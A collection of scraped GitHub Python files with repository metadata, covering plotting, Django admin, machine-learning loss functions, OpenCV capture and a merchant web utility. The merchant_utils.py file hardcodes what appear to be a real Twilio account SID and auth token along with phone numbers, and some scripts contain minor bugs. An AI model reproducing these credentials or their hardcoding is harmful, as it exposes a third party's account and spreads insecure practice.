arr = sorted(arr)
for i in range(1, len(arr)):
if((arr[i]+arr[i-1]) <= sum):
return arr[i]*arr[i-1]
return 0
sum = int(input())
arr = list(map(int, input().split()))
print(productSmall(sum, arr))
|
V-nsh/DSA
|
accenture practice/from_coding_ninjas_Site/Productsmallpair.py
|
Productsmallpair.py
|
py
| 642 |
python
|
en
|
code
| 1 |
github-code
|
6
|
30107078628
|
""" Python Package Imports """
# Not Applicable
""" Django Package Support """
from django.contrib import admin
""" Internal Package Support """
""" -- IMPORTED AT APPROPRIATE SUBSECTION -- """
"""
event/admin.py
Author: Matthew J Swann
Version: 1.0
Last Update: 2014-06-05
Update by: Matthew J Swann
"""
class EventAdmin(admin.ModelAdmin):
list_display = ('id', 'date', 'company_tag', 'city','state')
list_filter = ('state',)
search_fields = ['date', 'company_tag', 'state', 'creator_tag', 'date_created']
ordering = ['date', 'city', 'state']
fieldsets = (
( 'Advanced options', {
'classes': ('wide', 'extrapretty'),
'fields' : ('date_created', 'creator_tag', 'company_tag', 'date', 'date_time_start',
'date_time_end',
'title',
'sessionStart', 'sessionEnd', 'addressLineOne', 'addressLineTwo', 'city',
'state', 'zipCode')
}),)
from Event.models import (
Event
)
admin.site.register(Event, EventAdmin)
|
mjs0031/view_trials
|
Event/admin.py
|
admin.py
|
py
| 1,197 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32481834912
|
import matplotlib.pyplot as plt
import pandas as pd
import tensorflow as tf
from constants import nb_class
from tracking import get_dataframes
tf.compat.v1.enable_eager_execution() # Remove when switching to tf2
pd.plotting.register_matplotlib_converters()
###############################
# Methods for data formatting #
###############################
def get_n_probs_per_label(df):
outputs = []
for n in range(7):
outputs.append([[], [], [], [], [], [], []])
def handle_row(row):
classification_logits = eval(row["classification_logits"])
right_labels = eval(row["label_boxes"])
for i in range(len(classification_logits)):
logits = classification_logits[i]
right_label = right_labels[i]
probs = tf.nn.softmax(logits).numpy().tolist()
for n in range(7):
n_prob = probs[n]
outputs[right_label][n].append(n_prob)
df.apply(handle_row, axis=1)
for n in range(7):
for i in range(len(outputs[n])):
if (outputs[n][i] == []):
outputs[n][i] = [-1.]
outputs.append(outputs)
return outputs
def get_precision_distribution(df):
outputs = [[[], []], [[], []]]
def handle_row(row):
no_regr_precision = eval(row["no_regr_surface_precision"])[0]
final_precision = eval(row["final_surface_precision"])[0]
outputs[0][0].append(no_regr_precision[0] / no_regr_precision[1])
outputs[0][1].append(final_precision[0] / final_precision[1])
outputs[1][0].append(no_regr_precision[0])
outputs[1][1].append(final_precision[0])
df.apply(handle_row, axis=1)
return outputs
#########################################
# Initializing dataframes and variables #
#########################################
df = get_dataframes()
nb_rows = df["index"].count()
print("Dataframe size: {}".format(nb_rows))
df_tail = df.tail(1000)
all_probs_per_label = get_n_probs_per_label(df_tail)
precision_data = get_precision_distribution(df_tail)
############
# Plotting #
############
fig = plt.figure(figsize=(18, 12))
fig.canvas.set_window_title("Faster-RCNN graph - Last 1000 rows over {} total".format(nb_rows))
# Prob of label tail
plt.subplot(5, 2, 1)
probs_per_label = []
for k in range(7):
probs_per_label.append(all_probs_per_label[k][k])
parts = plt.violinplot(probs_per_label)
plt.xticks([])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Label Prob density")
# Prob of n label tail
for i in range(7):
plt.subplot(5, 2, 2 + i)
probs_per_label = all_probs_per_label[i]
parts = plt.violinplot(probs_per_label)
plt.xticks([])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_facecolor("#D43F3A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Prob density of {}".format(i))
# Precision distribution
plt.subplot(5, 2, 9)
parts = plt.violinplot(precision_data[0])
plt.xticks([1, 2], ["No Regr", "Final"])
plt.ylim(0., 1.)
plt.yticks([0., 1.])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_color("#F3C43A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
plt.title("Precision density")
# Coverage distribution
plt.subplot(5, 2, 10)
parts = plt.violinplot(precision_data[1])
plt.xticks([1, 2], ["No Regr", "Final"])
plt.yticks([144], ["Blob\nSurface"])
for pc in parts["bodies"]:
pc.set_alpha(1)
pc.set_color("#F3C43A")
parts["cmins"].set_alpha(0)
parts["cmaxes"].set_alpha(0)
parts["cbars"].set_alpha(0)
ax = plt.gca()
ax.axhline(y=144, color="black", lw=1., alpha=.2)
plt.title("Coverage density")
plt.show()
|
benoitkoenig/blobWar-image
|
faster_rcnn/visualization.py
|
visualization.py
|
py
| 3,864 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27009683508
|
from sklearn.gaussian_process import GaussianProcessRegressor
def run(x_train, y_train, x_test, y_test,
kernel, alpha, optimizer, n_restarts_optimizer, normalize_y, copy_X_train, random_state
):
reg = GaussianProcessRegressor(kernel=kernel,
alpha=alpha,
optimizer=optimizer,
n_restarts_optimizer=n_restarts_optimizer,
normalize_y=normalize_y,
copy_X_train=copy_X_train,
random_state=random_state).fit(x_train, y_train)
return {'train_predict': reg.predict(x_train).tolist(),
'test_predict': reg.predict(x_test).tolist(),
'train_score': reg.score(x_train, y_train),
'test_score': reg.score(x_test, y_test),
'X_train_': reg.X_train_.tolist(),
'y_train_': reg.y_train_.tolist(),
'L_': reg.L_.tolist(),
'alpha_': reg.alpha_.tolist(),
'log_marginal_likelihood_value_': reg.log_marginal_likelihood_value_}
|
lisunshine1234/mlp-algorithm-python
|
machine_learning/regression/gaussian_processes/GaussianProcessRegressor/run.py
|
run.py
|
py
| 1,133 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36052032500
|
import cv2
cap = cv2.VideoCapture(1,cv2.CAP_DSHOW)
if not cap.isOpened:
print('Cant open camera')
exit(0)
cap.set(3,480)
cap.set(4,720)
cnt = 80
path = "Main_picture/"
ret,frame = cap.read()
H,W,_ = frame.shape
while True:
ret,frame = cap.read()
cv2.circle(frame,(W//2,H//2),5,(0,255,0),-1)
key = cv2.waitKey(30)
if ret:
if key == ord("s"):
cv2.imwrite(f"{path}Img_{cnt}.jpg",frame)
cnt += 1
# Nhấn ESC hoặc q để thoát
cv2.imshow("Result",frame)
if key == 27 or key == ord("q"): break
cap.release()
cv2.destroyAllWindows
|
HieunnUTE/Rubik-solver-with-Image-processing
|
capture.py
|
capture.py
|
py
| 628 |
python
|
en
|
code
| 3 |
github-code
|
6
|
20800499152
|
n = int(input())
def prime_factors(n):
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
product = 1
factors = prime_factors(n)
for i in factors:
product *= factors.count(i) + 1
print(product)
|
michbogos/olymp
|
335/K.py
|
K.py
|
py
| 384 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42483090749
|
# pylint: disable=redefined-outer-name, unused-argument
"""
test src/config.py
"""
from contextlib import contextmanager
import pytest
from src.config import ConfigLoader
@contextmanager
def mock_open(config_content):
"""
Create config from mock file
"""
try:
yield config_content
finally:
pass
@pytest.fixture
def mock_open_config(monkeypatch):
"""
Mock a config file
"""
config_content = """
key1: value1
key2: value2
"""
monkeypatch.setattr(
'builtins.open',
lambda *args,
**kwargs: mock_open(config_content))
@pytest.fixture
def config_loader(mock_open_config):
"""
Return an instance of mocked configloader
"""
return ConfigLoader()
def test_load_config(config_loader):
"""
Test that config is loaded and accessible
"""
# Load the config
config = config_loader.load_config()
# Assert that the config is loaded and of the expected type
assert isinstance(config, dict)
# Add additional assertions based on your config structure and content
assert "key1" in config
assert config["key1"] == "value1"
|
dom38/secret-distribution-operator
|
tests/config_test.py
|
config_test.py
|
py
| 1,161 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30513785226
|
from gaesessions import get_current_session
import logging
import levr_classes as levr
import levr_encrypt as enc
import base64
from google.appengine.api import urlfetch,taskqueue
import json
import urllib
from datetime import datetime, timedelta
def login_check(self):
''' for merchants ONLY
check if logged in, and return a the headerdata if so. if not, bounce to the login page'''
session = get_current_session()
logging.debug(session)
if session.has_key('loggedIn') == False or session['loggedIn'] == False:
#not logged in, bounce to login page
logging.info('Not logged in. . .Bouncing!')
self.redirect('/merchants/login')
elif session.has_key('loggedIn') == True and session['loggedIn'] == True:
uid = session['uid']
owner_of = session['owner_of']
logging.info(uid)
headerData = {
'loggedIn' : session['loggedIn'],
'uid' : enc.decrypt_key(uid),
'owner_of' : enc.decrypt_key(owner_of),
'validated' : session['validated']
}
#return user metadata.
return headerData
return
def login_check_mobile(self):
session = get_current_session()
logging.debug(session)
if session.has_key('loggedIn') == False or session['loggedIn'] == False:
#not logged in, bounce to login page
logging.info('Not logged in. . .Bouncing!')
self.redirect('/merchants/mobile/login')
elif session.has_key('loggedIn') == True and session['loggedIn'] == True:
uid = session['uid']
owner_of = session['owner_of']
meta = {
'uid' : enc.decrypt_key(uid),
'owner_of' : enc.decrypt_key(owner_of)
}
logging.info(meta)
#return user metadata.
return meta
def validated_check(user):
'''checks if this user has any linked businesses or not. does not yet return these businesses'''
'''num_bus = user.businesses.count()
if num_bus > 0:
return True
else:
return False'''
if user.verified_owner == True:
return True
else:
return False
def create_deal(deal,business,owner):
'''deal: a deal object
merchant: the merchant to be set as the owner of the deal'''
# TODO: remove this. Deals are being created in too many places and some are missing info
#init tags
tags = []
#add tags from the merchant
tags.extend(business.create_tags())
logging.info(tags)
#add tags from deal stuff
tags.extend(levr.tagger(deal.deal_text))
logging.info(tags)
tags.extend(levr.tagger(deal.description))
logging.info(tags)
deal.tags = tags
#add some other miscellaneous information
deal.origin = 'merchant'
deal.pin_color = 'green'
#copy info over from business
deal.business_name = business.business_name
deal.businessID = str(business.key())
deal.business = business
deal.geo_point = business.geo_point
deal.geo_hash = business.geo_hash
deal.deal_status='active'
deal.date_end = None
deal.put()
logging.info(levr.log_model_props(deal))
#fire off a task to do the image rotation stuff
task_params = {
'blob_key' : str(deal.img.key())
}
taskqueue.add(url='/tasks/checkImageRotationTask',payload=json.dumps(task_params))
return deal
def call_merchant(business):
#call the business
#twilio credentials
sid = 'AC4880dbd1ff355288728be2c5f5f7406b'
token = 'ea7cce49e3bb805b04d00f76253f9f2b'
twiliourl='https://api.twilio.com/2010-04-01/Accounts/AC4880dbd1ff355288728be2c5f5f7406b/Calls.json'
auth_header = 'Basic '+base64.b64encode(sid+':'+token)
logging.info(auth_header)
request = {'From':'+16173608582',
'To':'+16052610083',
'Url':'http://www.levr.com/merchants/verify/answer',
'StatusCallback':'http://www.levr.com/merchants/verify/statusCallback'}
result = urlfetch.fetch(url=twiliourl,
payload=urllib.urlencode(request),
method=urlfetch.POST,
headers={'Authorization':auth_header})
logging.info(levr.log_dict(result.__dict__))
def check_ua(self):
uastring = str(self.request.headers['user-agent'])
logging.info(uastring)
if 'mobile' in uastring.lower():
logging.info('Serving mobile version')
return 'mobile'
else:
logging.info('Serving desktop version')
return 'desktop'
def mobile_ua_bounce(self):
uastring = str(self.request.headers['user-agent'])
logging.info(uastring)
if 'mobile' in uastring.lower():
logging.info('Serving mobile version')
else:
logging.info('Not a mobile device - bounding to /merchants/mobile desktop version')
self.redirect('/merchants/mobileonly')
|
holmesal/levr-2
|
merchant_utils.py
|
merchant_utils.py
|
py
| 4,377 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22023765931
|
#!/usr/bin/env python3
info = dict()
while(True):
e = input("Insira nome e idade separador por espaço: ")
if e == "sair" or e == "quit" or e == "exit":
break
dados = e.split()
if len(dados) > 2:
print("Use apenas um espaço para inserir dados")
continue
try:
info.update({dados[0]:int(dados[1])})
except ValueError:
print("A idade deve ser um número inteiro")
except IndexError:
print("Use um espaço entre o nome e a idade")
### Agora podemos criar as duas listas
under30 = [pessoa for pessoa, idade in info.items() if idade < 30]
over30 = [pessoa for pessoa, idade in info.items() if idade >= 30]
print("under30 = " + str(under30))
print("over30 = " + str(over30))
|
Ruanfc/lista3_python_para_engenharia
|
10/main.py
|
main.py
|
py
| 748 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
74946284667
|
import random
# losuje liczby całkowite z podanego przedziału i dodaje do tablicy
def drawingNumbers():
i = 0
global randomNumbers
randomNumbers = []
while i < 10:
randomNumber = random.randint(1, 20)
randomNumbers.append(randomNumber)
i = i + 1
# liczy ilość liczb większych od 5 i zwraca wynik
def countNumbers():
numbersAmount = 0
for x in randomNumbers:
if x > 5:
numbersAmount = numbersAmount + 1
return numbersAmount
# liczy średnią arytmetyczną dla liczb większych od 5 i zwraca wynik
def countArithmeticAvg():
arithemticAvg = 0
for x in randomNumbers:
if x > 5:
arithemticAvg = arithemticAvg + x
arithemticAvg = arithemticAvg / countNumbers()
arithemticAvg = round(arithemticAvg, 2)
return arithemticAvg
# liczy średnią geometryczną dla liczb większych od 5 i zwraca wynik
def countGeometricAvg():
geometricAvg = 1
for x in randomNumbers:
if x > 5:
geometricAvg = geometricAvg * x
geometricAvg = geometricAvg ** (1/countNumbers())
geometricAvg = round(geometricAvg, 2)
return geometricAvg
# sprawdza czy liczba jest pierwsza i zwraca boolean
def is_prime(n):
for i in range(2, int(n/2)):
if (n % i) == 0:
return False
return True
# dodaje liczby pierwsze do tablicy i zwraca tablice
def countPrimeNumbers():
primeNumbers = []
for x in randomNumbers:
if is_prime(x):
primeNumbers.append(x)
return primeNumbers
# wyświetla wyniki algorytmów
def showResults():
print('\n Wylosowane liczby:', randomNumbers)
print('\n Ilość liczb większych od 5:', countNumbers())
print('\n Średnia arytmetyczna liczb większych od 5:', countArithmeticAvg())
print('\n Średnia geometryczna liczb większych od 5:', countGeometricAvg())
print('\n Wylosowane liczby pierwsze:', countPrimeNumbers())
input()
# wywołuje funkcje
drawingNumbers()
showResults()
|
damqu44/Python-Course
|
algorytmy/main.py
|
main.py
|
py
| 2,015 |
python
|
pl
|
code
| 0 |
github-code
|
6
|
26555794429
|
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from .models import RootObject, Uri
class ModelTestCase(TestCase):
def setUp(cls):
# Set up data for the whole TestCase
user_type = ContentType.objects.get(app_label="auth", model="user")
RootObject.objects.create(self_contenttype=user_type, name="foo")
RootObject.objects.create(self_contenttype=user_type)
def test_root_object(self):
rfoo = RootObject.objects.get(name="foo")
rnone = RootObject.objects.get(name="")
self.assertEquals(str(rfoo), "foo")
self.assertEquals(str(rnone), "no name provided")
def test_uri(self):
ufoo = Uri.objects.create()
self.assertEquals(str(ufoo), "None")
|
acdh-oeaw/apis-core-rdf
|
apis_core/apis_metainfo/test_models.py
|
test_models.py
|
py
| 778 |
python
|
en
|
code
| 3 |
github-code
|
6
|
72698063549
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 21 10:29:50 2018
@author: qwzhou
"""
"""
=======================================
plot line and dash
=======================================
ASM across the site
"""
import numpy as np
import matplotlib.pyplot as plt
import sys
from matplotlib.backends.backend_pdf import PdfPages
#x = np.linspace(0, 10, 500)
y = []
z = []
k = []
def readfile(filename, y, z, k):
nline=0
with open(filename, 'r') as fig:
for line in fig:
data = line.split()
if nline == 0:
y.append(list(map(float,data[1:])))
elif nline == 1:
z.append(list(map(float,data[1:])))
elif nline == 2:
k.append(list(map(float,data[1:])))
nline=nline+1
#
#
#readfile("/Users/qiangweizhou/K562.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/IMR90.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/HepG2.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/A549.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/HUES64.asmonGeneend.Methy.1.txt", y,z, k)
#readfile("/Users/qiangweizhou/GM12878.asmonGeneend.Methy.1.txt", y,z, k)
readfile("/Users/qiangweizhou/A549.asmonExpressionGene.Methy.1.txt.Aver", y,z, k)
readfile("/Users/qiangweizhou/A549.asmonUnGene.Methy.1.txt.Aver", y,z, k)
x = np.linspace(1, len(y[0]), len(y[0]))
label=['Expression', 'Unexpreesion']
#label=['K562', 'IMR90', 'HepG2', 'A549', 'HUES64', 'GM12878']
filename="ASMonGeneExpression.all"
filename2=filename + ".pdf"
nsample=2
legend=1
percentage=1
cutoff=6
######################################################
def find_martrix_max_value(data_matrix):
new_data=[]
for i in range(len(data_matrix)):
new_data.append(max(data_matrix[i]))
return max(new_data)
xlen=len(y[0])
print(xlen, xlen/2)
#######################################################
def plotline(x, y, title, label, nsample, legend, filename):
prosamp = 0
fig, ax = plt.subplots()
while prosamp < nsample:
y[prosamp] = [i*percentage for i in y[prosamp]]
#for i,item in enumerate(y[prosamp]):
# if item >6:
# y[prosamp][i]=6
ax.plot(x, y[prosamp], label=label[prosamp]) #,color="dodgerblue"
prosamp = prosamp +1
#dashes = [10, 5, 100, 5]
#line1.set_dashes(dashes) # dash line
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
#ax.spines['left'].set_visible(False)
ax.xaxis.set_major_formatter(plt.FuncFormatter('{:.0f}'.format))
#ax.yaxis.set_major_formatter(plt.FuncFormatter('{:.1f}%'.format))
#plt.grid(True, 'major', 'y', ls='--', lw=.5, c='k', alpha=.3)
plt.tick_params(axis='both', which='both', bottom=False, top=False,
labelbottom=True, left=False, right=False, labelleft=True)
#ax.axes.get_xaxis().set_visible(False)
if legend == 1:
plt.legend(loc='best', prop={'size': 12}) # legend , loc is the legend location
#plt.axvline(x=xlen/2-1, ls="--", color='black')
plt.axhline(y=0, xmin=0.05, xmax=0.5, linewidth=8, color='gray')
plt.axhline(y=0, xmin=0.5, xmax=0.505, linewidth=8, color='k' )
plt.axhline(y=0, xmin=0.505, xmax=0.95, linewidth=8, color='gray')
scale_ls = [1,len(x)/2,len(x)]
index_ls = ['-200bp','Start', "+200bp"]
plt.xticks(scale_ls,index_ls,color='k', size=15)
ax.set_title(title,size=15)
ax.set_ylabel('ASM distribution',size=15)
#ax.set_ylabel('Methylation Level',size=15)
maxy = 100
maxy = find_martrix_max_value(y) * 1.1
ax.set_ylim(0.0, maxy)
#plt.show()
#filename2=filename + ".png"
#plt.savefig(filename2, bbox_inches='tight')
#label = ['IMR90', 'A549', 'H1', 'GM12878', 'encodeA549']
pdf = PdfPages(filename2)
plotline(x, y, "ASM distribution", label, nsample, legend, filename+".CG")
#plotline(x, y, "CG methylation distribution", label, nsample, legend, filename+".CG")
legend=0
#plotline(x, z, "CHG methylation distribution", label, nsample, legend, filename+".CHG")
#plotline(x, k, "CHH methylation distribution", label, nsample, legend, filename+".CHH")
pdf.savefig()
pdf.close()
'''
fig, ax = plt.subplots()
line1, = ax.plot(x, k1, label='IMR90')
#dashes = [10, 5, 100, 5]
#line1.set_dashes(dashes) # dash line
line2, = ax.plot(x, k2, label='A549')
# several dash line example
#line3, = ax.plot(x, y3, ':', label='..style')
#line4, = ax.plot(x,-np.sin(x)/2, '-.', label='-.style')
#line5, = ax.plot(x,np.sin(x)/4, '--', label='--style')
#line6, = ax.plot(x,-np.sin(x)/4, '^', label='--style')
#plt.axis('off')
#plt.xticks([])
#plt.yticks([])
#ax.axes.get_yaxis().set_visible(False)
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
#ax.spines['left'].set_visible(False)
#ax.axes.get_xaxis().set_visible(False)
plt.legend(loc='center right') # legend , loc is the legend location
plt.axhline(y=0, xmin=0.05, xmax=0.35, linewidth=8, color='gray')
plt.axhline(y=0, xmin=0.65, xmax=0.35, linewidth=8, color='k' )
plt.axhline(y=0, xmin=0.65, xmax=0.95, linewidth=8, color='gray')
scale_ls = [1,39,76,117]
index_ls = ['upstream','Start','End', "downstream"]
plt.xticks(scale_ls,index_ls,color='k', size=15)
#ax.set_title('Box plot')
ax.set_ylabel('Methylation Level',size=15)
maxy=max(k1)
if max(k2) > maxy:
maxy = max(k2)*1.1
else:
maxy = maxy*1.1
ax.set_ylim(0.0, maxy)
#plt.savefig("test.png")
plt.show()
'''
|
ZhouQiangwei/MethHaploScripts
|
plotASM-expressiongene.py
|
plotASM-expressiongene.py
|
py
| 5,901 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24764641791
|
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from .module import Module
from ...autograd import Variable, Backward
class Regression(Module):
'''Base loss function class for Regression task\n
Regression is the task of approximating a mapping function (f) from input variables (x) to a continuous output variable (y).
A continuous output variable is a real-value, such as an integer or floating point value. These are often quantities, such as amounts and sizes.
Args:
live_plot (bool): if True, plot the loss as training of the model proceeds.
'''
def __init__(self, live_plot=False):
self.live_plot = live_plot
self.losses = []
def forward(self, x, t, *args):
raise NotImplementedError
def _prepare_output(self, result, *args):
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
return result
class Classification(Module):
'''Base loss function class for Classification task\n
Classification is the task of approximating a mapping function (f) from input variables (x) to discrete output variables (y).
The output variables are often called labels or categories. The mapping function predicts the class or category for a given observation.
'''
def __init__(self, live_plot=False):
self.live_plot = live_plot
self.losses = []
def forward(self, x, t, *args):
raise NotImplementedError
def to_one_hot(self, x, classes):
'''
Convert labels into one-hot representation
Args:
x (np.array): labels in shape of [N]
classes (int): number of classes to classify
'''
labels = np.zeros((x.size, classes))
for i, label in enumerate(labels):
label[x[i]] = 1
return labels
def get_acc(self, x, t):
if x.shape[1] != 1:
pred = np.argmax(x.data, axis=1).reshape(-1,1)
else:
pred = x.data
if t.shape[1] != 1:
label = np.argmax(t.data, axis=1).reshape(-1,1)
else:
label = t.data
if pred.ndim != 2 or label.ndim != 2:
raise ValueError
return np.sum(pred == label) / x.shape[0]
class MSELoss(Regression):
'''Mean Square Error, Quadratic loss, L2 Loss\n
Creates a criterion that measures the mean squared error between n elements in the input x and target t.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
Shape:
- Input: [N, C]
- Target: [N, C]
- Output: [1] by default
[N] if not reduced
'''
def __init__(self, size_average=True, reduce=True):
super().__init__()
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
if x.shape != t.data.shape:
raise ValueError('[*] dimention of input {} and target {} did not match.'.format(x.shape, t.shape))
result = np.sum(np.power(x.data - t.data,2),axis=1)/x.shape[1]
result = self._prepare_output(result, args)
result.set_creator((MSELossBackward(result.shape, x, t)))
return result
class MSELossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return 2*(var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
# TODO
class HuberLoss(Regression):
'''Huber Loss, Smooth Mean Absolute Error\n
Huber loss is a loss function used in robust regression, that is less sensitive to outliers in data than the squared error loss.
Args:
delta (double): decide boundry value for Huber loss calculation. Default: 1
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
Shape:
- Input: [N, C]
- Target: [N, C]
- Output: [1] by default
[N] if not reduced
'''
def __init__(self, delta=1, size_average=True, reduce=True):
super().__init__()
self.delta = delta
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
if x.shape != t.data.shape:
raise ValueError('[*] dimention of input and target did not match.')
a = x.data - t.data
mask = (a <= self.delta)
result = np.zeros(a.shape)
result[mask] = (np.power(a,2)/2)[mask]
result[np.invert(mask)] = (self.delta*(np.abs(a)-self.delta/2))[mask]
result = self._prepare_output(result, args)
result.set_creator((HuberBackward(result.shape, x, t, self.delta, mask)))
return result
class HuberBackward(Backward):
def __init__(self, output_shape, var1, target, delta, mask):
def f(x):
a = var1.data - target.data
d = np.zeros(a.shape)
d[mask] = a[mask]
d[np.invert(mask)] = (delta*np.abs(a)/(a+1e-8))[mask]
return d
super().__init__(output_shape, var1, f)
# Classification
class CrossEntropyLoss(Classification):
'''Cross Entropy Loss\n
It is useful when training a classification problem with C classes.
This class incorporates the Softmax layer.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
live_plot (bool):
Shape:
- Input: [N,C] where C = number of classes
- Target: [N] where each value is 0 ≤ targets[i] ≤ C-1 or
[N,C] for one-hot representation
- Output: [1] as default
[N] if reduce is False
Model:
L(p,q) = -sum(p(x)logq(x))
'''
def __init__(self, size_average=True, reduce=True, live_plot=False):
super().__init__(live_plot=live_plot)
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
if t.ndim is 1:
t.data = self.to_one_hot(t.data, x.shape[1])
if x.shape != t.shape:
raise ValueError('[*] dimention of input {} and target {} did not match.'.format(x.shape, t.shape))
c = np.max(x.data, axis=1)
c = np.expand_dims(c, axis=1)
tmp = np.exp(x.data - c)
y = tmp / (np.expand_dims(np.sum(tmp, axis=1), axis=1) + 1e-8)
result = np.sum(-t.data * np.log(y), axis=1)
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
result.set_creator((CrossEntropyLossBackward(result.shape, x, t)))
return result
class CrossEntropyLossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return (var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
class BCELoss(Classification):
'''Binary Cross Entropy Loss\n
This is used for measuring the error of a reconstruction in for example an auto-encoder.
Note that the targets y should be numbers between 0 and 1.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
live_plot (bool):
Shape:
- Input: [N,2]
- Target: [N] where each value is 0 ≤ targets[i] ≤ 1 or
[N,2] for one-hot representation
- Output: [1] as default
[N] if not reduce is True
Model:
L(p,q) = -sum(p(x)logq(x)+(1-p(x))log(1-q(x)))
'''
def __init__(self, size_average=True, reduce=True, live_plot=False):
super().__init__(live_plot=live_plot)
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
if t.ndim is 1:
t.data = self.to_one_hot(t.data, x.shape[1])
if x.shape != t.shape:
raise ValueError('[*] dimention of input and target did not match.')
c = np.max(x.data, axis=1)
c = np.expand_dims(c, axis=1)
tmp = np.exp(x.data - c)
y = tmp/np.expand_dims(np.sum(tmp, axis=1), axis=1)
result = np.sum(-t.data * np.log(y) - (1 - t.data) * np.log(1 - y), axis=1)
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
result.set_creator((BCELossBackward(result.shape, x, t)))
return result
class BCELossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return (var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
|
Kashu7100/Qualia
|
qualia/nn/modules/loss.py
|
loss.py
|
py
| 10,787 |
python
|
en
|
code
| 3 |
github-code
|
6
|
74348735227
|
# https://www.acmicpc.net/problem/1912
# 예상 알고리즘: DP, 슬라이딩 윈도우?
# 베스트 알고리즘: DP
import sys
input = sys.stdin.readline
def solutionInput():
n = int(input().rstrip())
numbers = list(map(int, input().split()))
return n, numbers
def solution(n, numbers):
dp = numbers[0]
answer = numbers[0]
for i in range(1, n):
dp = max(dp+numbers[i], numbers[i])
answer = max(answer, dp)
return answer
print(solution(*solutionInput()))
|
ksh103/Algorithm-Study-Reboot
|
230102/장예찬_boj_1912_연속합.py
|
장예찬_boj_1912_연속합.py
|
py
| 504 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36609287561
|
import re
message = 'Call me 415-555-2345 tomorrow, or at 415-555-1245.'
phoneNumRegex = re.compile(r'(\d\d\d)-(\d\d\d-\d\d\d\d)')
mo = phoneNumRegex.search(message)
print(mo.group(1))
phoneNumRegex = re.compile(r'\d\d\d-\d\d\d-\d\d\d\d')
moList = phoneNumRegex.findall(message)
print(moList)
batRegex = re.compile(r'bat(man|mobile|bat)')
searchResults = batRegex.search('Batman is the best with a batmobile')
result = searchResults.group()
print(result)
batRegex = re.compile(r'Bat(wo)?man')
searchResults = batRegex.search('The adventures of Batman')
if searchResults != None:
result = searchResults.group()
print(result)
else:
print("No results found.")
searchResults = batRegex.search('The adventures of Batwoman')
if searchResults != None:
result = searchResults.group()
print(result)
else:
print("No results found.")
|
rain15/MyPythonScripts
|
phone.py
|
phone.py
|
py
| 857 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15932153331
|
"""
A simple cache system for storing such things as project hierarchies and templates.
By default uses diskcache for simpler setup and backward compatibility
unless 'memcached' is set in the 'cache' section of the
config, in which case use that.
"""
import logging
from hydra_base import config as hydraconfig
import tempfile
log = logging.getLogger(__name__)
global cache
if hydraconfig.get('cache', 'type') != "memcached":
import diskcache as dc
